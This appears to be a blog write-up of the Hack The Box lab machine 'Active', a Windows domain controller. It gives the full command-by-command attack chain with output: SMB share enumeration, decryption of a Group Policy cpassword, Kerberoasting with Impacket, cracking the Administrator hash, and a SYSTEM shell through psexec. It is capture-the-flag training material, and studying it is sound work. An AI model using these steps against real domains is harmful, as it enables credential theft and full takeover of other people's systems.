Home Active
Post
Cancel

Active

Active is an easy level Windows machine on HacktheBox which starts with enumerating an SMB share on a domain controller to find an encrypted gpp password, which we can decrypt and get access to the domain as a low priveleged user, we then find that the Administrator account can be Kerberoasted, giving us full access to the DC.

Enumeration

Nmap shows us

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# Nmap 7.93 scan initiated Wed Jan 25 21:02:22 2023 as: nmap -sC -sV -p- -oN nmap.out 10.10.10.100N
map scan report for active.htb (10.10.10.100)
Host is up (0.049s latency).
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-01-26 02:03:19Z)135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp   open  tcpwrapped
3268/tcp  open  ldap       Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found
49152/tcp open  msrpc   Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC4
9154/tcp open  msrpc     Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC49165/tcp open  msrpc   Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPCService Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Our trusty nmap script gave us tons of info, the open ports (53,88,139,389,445) tell us we will be attacking a domain controller, which nmap has found is named DC.active.htb, so we’ll add DC.active.htb and active.htb to our /etc/hosts file. We can poke around SMB to check if there’s any non-standard shares, we can expect to atleast see SYSVOL, NETLOGON, and some admin shares (though we probably won’t be able to read the contents). We can use smbclient -l to list the shares which shows us:

1
2
3
4
5
6
7
8
9
10
11
12
13
smbclient -L //10.10.10.100/      
Password for [WORKGROUP\kali]:
Anonymous login successful        
Sharename       Type      Comment       
---------       ----      -------        
ADMIN$          Disk      Remote Admin        
C$              Disk      Default share        
IPC$            IPC       Remote IPC        
NETLOGON        Disk      Logon server share         
Replication     Disk              
SYSVOL          Disk      Logon server share         
Users           Disk      
Reconnecting with SMB1 for workgroup listing.

If we try to go inside any of these, we get tree connect failed: NT_STATUS_ACCESS_DENIED except for the Replication share. Let’s download the entire share to our machine with:

1
2
3
4
5
6
7
└─$ smbclient //10.10.10.100/Replication/
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *

There’s not much, but we do find a Groups.xml file, which contains a username and encrypted “cpassword”. Sysadmins used to be able to set user passwords via Group Policy with cpasswords, until Microsoft patched it in 2014 and blocked usage of the cpassword in new policies, which is cool, but they also leaked the decryption key on their support site. We can use a default kali tool “gpp-decrypt” to decrypt the password. Anyways this is what the groups.xml file looks like.

1
2
3
└─$ cat /home/kali/htb/Active/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

<?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User></Groups>

Decrypting the cpassword gives us the credentials SVC_TGS:GPPstillStandingStrong2k18, which lets us grab the user flag with

1
smbclient //10.10.10.100/Users/ -U "SVC_TGS"

We can also use some tools from the Impacket suite to interact with the domain.

1
2
3
4
5
6
7
./GetADUsers.py -all active.htb/svc_tgs:GPPstillStandingStrong2k18
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Querying active.htb for information about domain.Name                  Email                           PasswordLastSet        LastLogon           --------------------  -----------------------------  -------------------  -------------------
Administrator           2018-07-18 15:06:40.351723     2023-01-25 18:58:13.159750 
Guest                   <never>                        <never>             
krbtgt                  2018-07-18 14:50:36.972031     <never>             SVC_TGS                 2018-07-18 16:14:38.402764     2023-01-26 12:25:29.633317 

We can see if any users are kerberoastable by requesting service tickets from the domain controller with the GetUserSPNS.py script.

1
./GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

Which gives us an administrator hash we can crack using john.

1
2
john hash.txt --show                                            
?:Ticketmaster1968

We can then use psexec to get a shell with these credentials

1
2
3
4
5
6
7
8
9
10
11
12
13
14
./psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file TACcfYCj.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service xJWe on 10.10.10.100.....
[*] Starting service xJWe.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Windows\system32> whoami
nt authority\system
This post is licensed under CC BY 4.0 by the author.